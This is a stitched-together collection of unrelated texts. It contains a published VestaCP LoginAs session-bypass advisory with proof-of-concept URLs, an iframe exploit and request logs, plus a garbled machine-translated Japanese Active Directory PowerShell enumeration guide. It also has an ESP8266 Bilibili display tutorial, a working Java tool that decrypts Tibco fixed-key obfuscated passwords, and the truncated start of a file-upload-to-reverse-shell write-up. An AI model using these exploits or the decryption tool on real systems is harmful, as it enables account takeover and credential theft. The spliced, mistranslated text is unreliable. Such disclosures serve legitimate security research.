Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# Exploit Title: VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation
# Date: 2020-11-26
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://vestacp.com/
# Software Link: https://vestacp.com/install/
# Version: 0.9.8-26
Document Title:
===============
VestaCP v0.9.8-26 - (LoginAs) Token Session Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2240
Release Date:
=============
2020-11-26
Vulnerability Laboratory ID (VL-ID):
====================================
2240
Common Vulnerability Scoring System:
====================================
8.3
Vulnerability Class:
====================
Insufficient Session Validation
Current Estimated Price:
========================
2.000€ - 3.000€
Product & Service Introduction:
===============================
Web interface is open source php and javascript interface based on Vesta
open API, it uses 381 vesta CLI calls.
The GNU General Public Licence is a free, copyleft licence for software
and other kinds of works. Its free to change,
modify and redistribute source code.
(Copy of the Homepage: https://vestacp.com/features/ &
https://vestacp.com/install/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a
insufficient session validation vulnerability in the VestaCP v0.9.8-26
hosting web-application.
Affected Product(s):
====================
Vesta
Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-05-04: Researcher Notification & Coordination (Security Researcher)
2020-05-05: Vendor Notification (Security Department)
2020-05-07: Vendor Response/Feedback (Security Department)
2020-**-**: Vendor Fix/Patch (Service Developer Team)
2020-**-**: Security Acknowledgements (Security Department)
2020-11-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Pre Auth (No Privileges or Session)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Full Disclosure
Technical Details & Description:
================================
A session token vulnerability has been discovered in the official
VestaCP (Control Panel) v0.9.8-26 hosting web-application.
The vulnerability allows remote attackers to gain unauthenticated or
unauthorized access by client-side token manipulation.
The token vulnerability is located in the function of the `LoginAs`
module. Remote attackers are able to perform LoginAs requests
without session token to preview there profiles. The attack requires
user account privileges for manipulation of the request.
The admin panel allows to request via token the local user accounts to
login as via account switch. In that moment the token
of the request can be removed to perform the same interaction with user
privileges. Thus allows to access other account
information without administrative permissions. The permission approval
on login request is insufficient regarding a
misconfiguration on the token implementation (client-side).
Successful exploitation of the web vulnerability results in information
disclosure, user or admin account compromise and
elevation of privileges by further exploitation.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] /login/
Vulnerable Parameter(s):
[+] token
Affected Parameter(s):
[+] loginas
Proof of Concept (PoC):
=======================
The token web vulnerability can be exploited by remote attackers with
simple user privileges without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Request: Default (Download Backup)
https://vestacp.localhost:8083/login/?loginas=user&token=f230a989082eec102ad5a3bb81fd0190
https://vestacp.localhost:8083/login/?loginas=admin&token=f230a989082eec102ad5a3bb81fd0190
PoC: Exploitation
https://vestacp.localhost:8083/login/?loginas=user/.admin&token=null
PoC: Exploit
<html>
<head><body>
<title>VestaCP (Control Panel) v0.9.8-26 - LoginAs User/Admin PoC</title>
<iframe
src="https://vestacp.localhost:8083/login/?loginas=admin&token=null"%20>
</body></head>
<html>
--- PoC Session Logs [GET] ---
https://vestacp.localhost:8083/login/?loginas=[ACCOUNTNAME]&token=null
Host: vestacp.localhost:8083
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://vestacp.localhost:8083/list/user/
Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6;
__utmc=80953744;
__utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/;
_ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2;
PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0;
__utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1;
metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
-
GET: HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
Location: /
-
https://vestacp.localhost:8083/
Host: vestacp.localhost:8083
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://vestacp.localhost:8083/list/user/
Connection: keep-alive
Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6;
__utmc=80953744;
__utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/;
_ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2;
PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0;
__utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1;
metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
-
GET: HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
-
Location: /list/user/
https://vestacp.localhost:8083/list/user/
Host: vestacp.localhost:8083
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://vestacp.localhost:8083/list/user/
Connection: keep-alive
Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6;
__utmc=80953744;
__utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/;
_ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2;
PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0;
__utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1;
metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
-
GET: HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
Content-Encoding: gzip
-
Welcome - Logged in as user admin
Reference(s):
https://vestacp.localhost:8083/
https://vestacp.localhost:8083/login/
https://vestacp.localhost:8083/login/?loginas
https://vestacp.localhost:8083/list/user/
Security Risk:
==============
The security risk of the remote session vulnerability in the vestacp
application is estimated as high.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
0x00はじめに
Microsoftは、Windows Server 2008 R2(およびその後)に複数のActive Directory PowerShell CMDLetsを提供します。
Windowsクライアントでは、リモートサーバー管理ツール(RSAT)をインストールし、Active Directory PowerShellモジュールがインストールされていることを確認する必要があります。 Windows Server(2008 R2以降)で、PowerShellコンソールで次のコマンドを実行します(管理者として):Import-Module ServerManager。 add-windowsfeature rsat-ad-powershell。
0x01広告ディレクトリプレビュー
AD PowerShell CMDLETSは、次の方法と同じ効果があります。
インポートモジュールアクティブディレクトリ
$ userid="joeuser"
get-aduser $ userid –property *
PowerShell V3バージョンとより高いバージョンでは、PowerShellが必要なモジュールを認識して自動的にロードするため、コマンドの最初の行を実行する必要はないことに注意してください。 Active Directory PowerShellモジュールがロードされたら、ファイルシステムを閲覧するのと同じように広告を閲覧できます。コマンドは次のとおりです。
PS Import-Module ActiveDirectory
PSDIR AD:
PSSET-Location AD:
PSセットロケーション "dc=lab、dc=adsecurity、dc=org"
psdir
0x02便利なコマンド(cmdlets)
を見つけます1。利用可能なPowerShellモジュールの基本的なモジュールと統計的発見:Get-Module -Listavailable
PowerShellモジュールでCMDLETを発見:Get -Command -Module ActiveDirectory
PowerShell ADモジュールのcmdletsの数:
(Get -Command -Module ActiveDirectory).Count
Windows Server 2008 R2: 76 CMDLETS
Windows Server 2012: 135 cmdlets
Windows Server 2012 R2: 147 CMDLETS
Windows Server 20163360147 CMDLETS
Windows Server 2008 R2メインCMDLETS:
•get/set-adforest
•get/set-addomain
•get/set-addomaincontroller
•get/set-aduser
•get/set-adcomputer
•get/set-adgroup
•get/set-adgroupMember
•get/set-adobject
•Get/Set-AdorganizationalUnit
•enable-adoptionalfeature
•無効化/有効化- アダクカウント
•move-addirectoryserveroperationmasterrole
•新しい虐待者
•new-adcomputer
•new-Adggroup
•new-adobject
•new-adorganizationalUnit
Windows Server 2012には、いくつかの新しいcmdlets:が含まれています
• *-ADRESOURCEPROPERTYLISTMEMBER
• *-adeuthenticationPolicy
• *-adeuthenticationPolicysilo
• *-adcentralaccesspolicy
• *-adcentralAccessrule
• *-AdresourceProperty
• *-ADRESOURCEPROPERTYLIST
• *-ADRESOURCEPROPERTYVALUEETYPE
• *-ADDCCLONECONFIGFILE
• *-adreplicationAttributeMetadata
• *-ADREPLICATIONCONNECTION
• *-ADREPLICATIONFAILURE
• *-ADREPLICATIONPARTNERMETADATA
• *-ADREPLICITIONQUEUOOPERATION
• *-ADREPLICESSITE
• *-ADREPLICATIONSITELINK
• *-ADREPLICATIONSITELINKBRIDGE
• *-ADREPLICATIONSUBNET
• *-ADREPLICATIONUPTODATENESSEVECTORTABLE
•sync-adobject
2。グローバルディレクトリを発見するグローバルカタログ(GCS)•Forest GCS(Forest Global Directory):
インポートモジュールアクティブディレクトリ
$ adforest=get-adforest
$ adforestglobalcatalogs=$ adforest.globalcatalogs
•GCSであるドメインDC(ドメインDCのグローバルディレクトリとして):
インポートモジュールアクティブディレクトリ
$ dcsnotgcs=get -addomaincontroller -filter {isglobalcatalog -eq $ true}
•GCSではないドメインDC(非ドメインDCのグローバルディレクトリとして):
インポートモジュールアクティブディレクトリ
$ dcsnotgcs=get -addomaincontroller -filter {isglobalcatalog -eq $ false}}
3. Active Directory Flexible Single Host操作(FSMO)役割Active Directoryモジュールを見つけます。
(get-adforest).schemamaster
(get-adforest).domainnamingmaster
(get-addomain).infrastructuremaster
(get-addomain).pdcemulator
(get-addomain).ridmaster
.NETコール:
•現在のドメイン:を取得します
[System.DirectoryServices.activedirectory.domain] :GetCurrentDomain()。名前
[System.DirectoryServices.activedirectory.domain] :GetComputerDomain()。名前
•コンピューターのsite: [system.directoryservices.activedirectory.activedirectorysite] :getComputerSite()を取得します
•すべてのドメインコントローラーをドメイン: [System.DirectoryServices.Activedirectory.domain] :GetCurrentDomain()。ドメインコントロラーにリストします
•Active Directory Domain Mode: [System.DirectoryServices.Activedirectory.Domain] :GetCurrentDomain()。ドメインモードを取得します
•Active Directory FSMOS:([system.directoryservices.activedirectory.forest] :getCurrentforest())
([system.directoryservices.activedirectory.forest] :getCurrentforest())
([system.directoryservices.activedirectory.domain] :getCurrentDomain())
([system.directoryservices.activedirectory.domain] :getCurrentDomain())
([system.directoryservices.activedirectory.domain] :getCurrentDomain())
•Active Directory Forest Name:を取得します
[System.DirectoryServices.Activedirectory.Forest] :GetCurrentForest()。名前
•アクティブのサイトのリストを取得します
ディレクトリフォレスト:
[配列] $ adsites=
[System.DirectoryServices.Activedirectory.Forest] :GetCurrentForest()。サイト
•Active Directory Forest Domains:を取得します
[System.DirectoryServices.Activedirectory.Forest] :GetCurrentForest()。ドメイン
•Active Directory Forest Globalを取得します
カタログ:
[System.DirectoryServices.Activedirectory.Forest] :GetCurrentForest()。GlobalCatalogs
•Active Directory Forest Mode:を取得します
[System.DirectoryServices.Activedirectory.Forest] :GetCurrentForest()。ForestMode
•アクティブディレクトリフォレストルートを取得します
domain3360
[System.DirectoryServices.Activedirectory.Forest] :GetCurrentForest()。rootdomain
4。FSMOの役割は、あるDCから別のDCGet-Commandに移動します
-module Activedirectory -Noun *Master *
•移動FSMOロール:
move-addirectoryserveroperationmasterrole
-identity $ dcname -operationmasterrole ridmaster
move-addirectoryserveroperationmasterrole
- アイデンティティ$ dcname-
OperationMasterrole
DomainNamingMaster
move-addirectoryserveroperationmasterrole
-identity $ dcname -operationmasterrole pdcemulato
•FSMOロールの押収:
move-addirectoryserveroperationmasterrole
-identity $ dcname -operationmasterrole pdcemulator -force
0x03 Active Directory PowerShell Module Cmdletの例
1.Get-Rootdse LDAPサーバー(ドメインコントローラー)に関する情報を取得し、その内容を表示します。結果には、DCが実行するオペレーティングシステム情報など、いくつかの興味深い情報が含まれています。
2.Get-Adforestは、このコマンドを実行しているコンピューターでアクティブに提供します
ディレクトリフォレスト情報。
3。Get-Addomainは、現在のドメインに関する情報を提供します
4.Get-AddomainControllerは、ドメインコントローラーに固有のコンピューター情報を提供します。 CMDLETコマンドを介して、特定のサイトですべてのDCSまたはONSバージョン情報を簡単に見つけることができます。
5.Get-AdComputerは、ADのほとんどのコンピューターオブジェクトに関する情報を提供します。 「-Prop *」パラメーターで実行されるコマンドは、すべての標準属性情報を表示できます。
6。広告コンピューターの統計$ time=(測定コマンド `
{[array] $ allcomputers=
get -adcomputer -filter * -properties
名前、canonicalName、enabled、passwordlastset、samaccountname、lastlogontimest
AMP、DistinguishedName、OperatingSystem
})。トータルミニュート
$ allcomputerscount=
$ allcomputers.count
書き込み出力「ありました
$ allcomputerscountコンピューターで発見されました
$ domaindns in $ time分… `r"
7.Get-Aduserは、広告ユーザーに関するコンテンツのほとんどに関する情報を提供します。 「-Prop *」パラメーターを使用してコマンド実行は、すべての標準属性情報を表示できます。
8。広告ユーザー統計インポートモジュールActive Directory
$ domaindns=
[System.DirectoryServices.activedirectory.domain] :GetCurrentDomain()。名前
[array] $ allusers=get-aduser
-filter * -properties
名前、distinguedname、enabled、lastlogondate、lastlogontimestamp、lockedout、msexchhom
eservername、samaccountname
$ alluserscount=$ allusers.count
書き込み出力「ありました
$ aldomaindnsrootで発見されたユーザーオブジェクト… "
[array] $ disabledusers=
$ Allusers | where -object {$ _。enabled -eq $ false}
$ DisabledUserScount=
$ disabledusers.count
[array] $ enabledusers=$ allusers
| where -object {$ _。enabled -eq $ true}
$ enableduserscount=
$ enabledusers.count
書き込み出力「あります
$ enableduserscountはユーザーを有効にし、$ disableduserscountがあります
$ domaindnsの無効なユーザー」
9.Get-Adgroupは広告グループに関する情報を提供し、次のコマンドを実行してすべてのセキュリティグループを見つけます。
get -adgroup -filter {groupCategory -EQ 'セキュリティ}
10.Get-AdgroupMemberの列挙およびグループメンバー情報を返します。 「-Recursive」パラメーターを使用して、ネストされたグループのすべてのメンバーを含めます。
Get -AdgroupMember「管理者」 - 再編成
11.非アクティブコンピューターを見つける次の例は、非アクティブな(古いバージョン)コンピューターとユーザーを探します。過去10日間にパスワードが変更されていないアカウント。これはテストの例であることに注意してください。実際の生産環境については、この推奨事項を60〜90日間のコンピューターと、ユーザー向けの180〜365日間の戦略に変更します。
12.非アクティブユーザーを見つける
13。ドメイントラスト
を列挙します
14。アクティビティディレクトリの実装日を取得
15.広告パスワードポリシーを取得する
16。広告サイト情報を取得するには、Windows 2012モジュールにサイトのcmdlet(get-adreplicationsite*)が含まれていることに注意してください。
17。TOMBSTONELIFETIME情報を取得する
18.ADのリサイクル情報には、森林機能モード=が必要です
Windows Server 2008 R2
•リサイクルビンを有効にします
(エンタープライズ管理者として)
enable-adoptionalfeature
–Indidity 'CN=リサイクルビン機能、CN=オプション機能、CN=ディレクトリ
サービス、CN=Windows
nt、cn=services、cn=configuration、dc=domain、dc=com ’–Scope
ForestorConfigurationset - ターゲット
「domain.com」
•すべての削除されたユーザーを見つけます
$ deletedusers=get-adobject
-searchbase "cn=削除されたオブジェクト、dc=domain、dc=com" -filter
{objectc
In this article, we will introduce to you the information related to the use of ESP8266 and OLED screen to display B station through pictures, text and videos.
Effect
Preparation
esp82660.96-inch OLED screen DuPont line several B stations id
Experimental Environment
esp8266 version 2.7.1U8g2_ArduinoTimeArduinoJsonArduinoHttpClient If the installation fails due to network reasons when installing these libraries, you can directly download the offline library and place it in the libraries directory under the IDE.
Code
/***************************************************************************
ESP8266 with 0.96inch OLED pin
VCC --- VCC
GND --- GND
SDA --- SDA(D1)
SCL --- SCL(D2)
******************************************************************
#if defined(ESP32) //ESP32
#include WiFi.h
#include HTTPClient.h
#include WebServer.h
#include ESPmDNS.h
#elif defined(ESP8266) //ESP8266
#include ESP8266WiFi.h
#include ESP8266HTTPClient.h
#include ESP8266WebServer.h
#include ESP8266mDNS.h
#else
#error 'Please check your mode setting,it must be esp8266 or esp32.'
#endif
#include ArduinoJson.h
#include U8g2lib.h
#include Wire.h
#include Ticker.h
//Timer
Ticker timer;
int count=0;
boolean flag=true;
//JSON
DynamicJsonBuffer jsonBuffer(256); //ArduinoJson V5
//Display screen If the pins are different, you need to modify it here
//U8G2_SSD1306_128X64_NONAME_F_HW_I2C u8g2(U8G2_R0, /* reset=*/U8X8_PIN_NONE, /* clock=*/D2, /* data=*/D1);
U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //Here D1 D2 is the corresponding welding pin
//WiFi name and password
const char *ssid='PDCN'; //Fill in your wifi name here
const char *password='1234567890';//Fill in your wifi password here
//Dot map of 24*24 small TV
const unsigned char bilibilitv_24u[] U8X8_PROGMEM={0x00,0x00,0x02,0x00,0x00,0x03,0x30,0x00,0x01,0xe0,0x80,0x01,
0x80,0xc3,0x00,0x00,0xef,0x00,0xff,0xff,0xff,0x03,0x00,0xc0,0xf9,0xff,0xdf,0x09,0x00,0xd0,0x09,0x00,0xd0,0x89,0xc1,
0xd1,0xe9,0x81,0xd3,0x69,0x00,0xd6,0x09,0x91,0xd0,0x09,0xdb,0xd0,0x09,0x7e,0xd0,0x0d,0x00,0xd0,0x4d,0x89,0xdb,0xfb,
0xff,0xdf,0x03,0x00,0xc0,0xff,0xff,0xff,0x78,0x00,0x1e,0x30,0x00,0x0c
};
//B station API URL : follow, view, likes
String NAME='Xiaoyaozi'; //Change it into your own name
String UID='430579369'; //Change it to your own UID
String followUrl='http://api.bilibili.com/x/relation/stat?vmid=' + UID; //Number of fans
String viewAndLikesUrl='http://api.bilibili.com/x/web-interface/card?mid=' + UID; //Number of plays and likes
long follower=0; //Number of fans
long view=0; //Number of plays
long likes=0; //Number of likes received
void setup()
{
//OLED initialization
u8g2.begin();
u8g2.enableUTF8Print();
u8g2.clearDisplay();
u8g2.setFont(u8g2_font_wqy12_t_gb2312a);
u8g2.drawXBMP( 16 , 9 , 24 , 24 , bilibilitv_24u );
u8g2.setCursor(45, 19);
u8g2.print('Powered by');
u8g2.setCursor(45, 31);
u8g2.print('Xiaoyaozi's big cousin');
u8g2.setFont(u8g2_font_wqy12_t_gb2312a);
u8g2.setCursor(10, 50);
u8g2.print('blog.bbskali.cn');
u8g2.sendBuffer();
delay(5000);
u8g2.setFont(u8g2_font_wqy12_t_gb2312b);
u8g2.setFontPosTop();
u8g2.clearDisplay();
Serial.begin(115200);
//WiFi connection
WiFi.begin(ssid, password);
while (WiFi.status() !=WL_CONNECTED)
{
delay(500);
Serial.print('.');
}
Serial.println('');
Serial.println('WiFi connected');
timer.attach(60, timerCallback); //Every 1 minute
//The first call to obtain the data function, which is convenient for display when powered on
getFollower(followerUrl);
getViewAndLikes(viewAndLikesUrl);
}
void loop()
{
While (flag)
{
if (count==0)
{
//display data
Serial.println('count=0, display data');
u8g2.firstPage();
do
{
display(follower, likes, view);
} while (u8g2.nextPage());
flag=false;
} else if (count==1) {
//get follower
Serial.println('count=1, get follower');
getFollower(followerUrl);
flag=false;
} else if (count==2) {
//get view and likes
Serial.println('count=2, get view and likes');
getViewAndLikes(viewAndLikesUrl);
flag=false;
}
}
}
//Timer callback function
void timerCallback()
{
count++;
if (count==3)
{
count=0;
}
flag=true;
}
//Get the number of fans on B station
void getFollower(String url)
{
HTTPClient http;
http.begin(url);
int httpCode=http.GET();
Serial.printf('[HTTP] GET. code: %d\n', httpCode);
if (httpCode==200)
{
Serial.println('Get OK');
String resBuff=http.getString();
//---------- ArduinoJson V5 ----------
JsonObject root=jsonBuffer.parseObject(resBuff);
if (!root.success())
{
Serial.println('parseObject() failed');
return;
}
follower=root['data']['follower'];
Serial.print('Fans:');
Serial.println(follower);
}
else
{
Serial.printf('[HTTP] GET. failed, error: %d\n', httpCode);
}
http.end();
}
//Get the number of plays and likes on B station
void getViewAndLikes(String url)
{
HTTPClient http;
http.begin(url);
int httpCode=http.GET();
Serial.printf('[HTTP] GET. code: %d\n', httpCode);
if (httpCode==200)
{
Serial.println('Get OK');
String resBuff=http.getString();
//---------- ArduinoJson V5 ----------
JsonObject root=jsonBuffer.parseObject(resBuff);
if (!root.success())
{
Serial.println('parseObject() failed');
return;
}
likes=root['data']['like_num'];
view=root['data']['archive_count'];
Serial.print('Likes:');
Serial.println(likes);
Serial.print('View:');
Serial.println(view);
}
else
{
Serial.printf('[HTTP] GET. failed, error: %d\n', httpCode);
}
http.end();
}
//OLED display data
void display(long follower, long likes, long view)
{
u8g2.clearDisplay();
u8g2.setCursor(5, 25);
u8g2.print('Number of fans:' + String(follower));
u8g2.setCursor(5, 39);
u8g2.print('Number of likes:' + String(likes));
u8g2.setCursor(5, 52);
u8g2.print('Number of manuscripts:' + String(view));
u8g2.setCursor(5, 6);
u8g2.print('bilibili@' + String(NAME)); //Change it to your own name
}
Summary of Problems
After the code is uploaded, this problem occurs when the display screen does not light up. Check whether your connection is normal. Whether the corresponding pin D1 D2 is suitable. Of course, you can modify the following commands to customize the pins.
U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); Regarding the interface, most API interfaces on Bilibili are currently https. For https we need to configure the certificate information in esp8266. More troublesome. I searched the interface in the article for a long time before I found two interfaces of the available http protocol. (Of course, it will also hang up at any time). So, on this basis, the way I thought of is to save the json data from the API interface locally using python. Then just access the json data locally. At the same time, do scheduled tasks to update data in real time.
# Exploit Title: Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption
# Date: December 8th 2020
# Exploit Author: Tess Sluijter
# Vendor Homepage: https://www.tibco.com
# Version: 5.11x and before
# Tested on: MacOS, Linux, Windows
# Tibco password decryption exploit
## Background
Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling:
1. Using a custom key.
2. Using a machine key.
3. Using a fixed key.
https://docs.tibco.com/pub/runtime_agent/5.11.1/doc/pdf/TIB_TRA_5.11.1_installation.pdf?id=2
This write-up pertains to #3 above.
Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!. For example: "#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA".
## Issues
On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key. For example:
* https://support.tibco.com/s/article/Tibco-KnowledgeArticle-Article-30338
* https://community.tibco.com/questions/password-encryptiondecryption
* https://community.tibco.com/questions/deobfuscatedecrypt-namevaluepairpassword-gv-file
* https://community.tibco.com/questions/bw6-password-decrypt
* http://tibcoworldin.blogspot.com/2012/08/decrypting-password-data-type-global.html
* http://tibcoshell.blogspot.com/2016/07/how-to-decrypt-encryptedmasked-password.html
## Impact
Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does **not** require access to Tibco software or libraries. All you need are exfiltrated secret strings that start with the characters #!. This is not going to be fixed by Tibco, this is a design decision also used for backwards compatibility in their software.
## Instructions
Compile with:
javac decrypt.java
Examples of running, with secrets retrieved from websites and forums:
java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
7474
java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
tibco
/* comments!
Compile with:
javac decrypt.java
Run as:
java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
7474
java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
tibco
*/
import java.io.ByteArrayInputStream;
import java.util.Arrays;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.spec.SecretKeySpec;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.CipherInputStream;
import javax.crypto.CipherOutputStream;
class Decrypt
{
public static void main (String [] arguments)
{
try
{
byte[] keyBytes = { 28, -89, -101, -111, 91, -113, 26, -70, 98, -80, -23, -53, -118, 93, -83, -17, 28, -89, -101, -111, 91, -113, 26, -70 };
String algo = "DESede/CBC/PKCS5Padding";
String encryptedText = arguments[0];
byte[] message = Base64.getDecoder().decode(encryptedText);
ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(message);
Cipher decipher = Cipher.getInstance(algo);
int i = decipher.getBlockSize();
byte[] ivSetup = new byte[i];
byteArrayInputStream.read(ivSetup);
SecretKey key = new SecretKeySpec(keyBytes, 0, keyBytes.length, "DESede");
decipher.init(2, key, new IvParameterSpec(ivSetup));
// Magic, I admit I don't understand why this is needed.
CipherInputStream cipherInputStream = new CipherInputStream(byteArrayInputStream, decipher);
char[] plaintext;
char[] arrayOfChar1 = new char[(message.length - i) / 2];
byte[] arrayOfByte4 = new byte[2];
byte b = 0;
while (2 == cipherInputStream.read(arrayOfByte4, 0, 2)) {
arrayOfChar1[b++] = (char)((char)arrayOfByte4[1] << '\b' | (char)arrayOfByte4[0]);
}
cipherInputStream.close();
if (b == arrayOfChar1.length) {
plaintext = arrayOfChar1;
} else {
char[] arrayOfChar = new char[b];
System.arraycopy(arrayOfChar1, 0, arrayOfChar, 0, b);
for (b = 0; b < arrayOfChar1.length; b++) {
arrayOfChar1[b] = Character.MIN_VALUE;
}
plaintext = arrayOfChar;
// End of Magic
}
System.out.println(plaintext);
}
catch (Exception ex)
{
System.out.println("Barf...");
System.out.println(ex);
}
}
}
# Exploit Title: Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-08
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS
Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on the logged in username on header and select Manage Account.
Step 3: Upload a php payload ( i used the default php webshell in
/usr/share/webshells/php/php-reverse-shell.php) or a jpeg image embeded
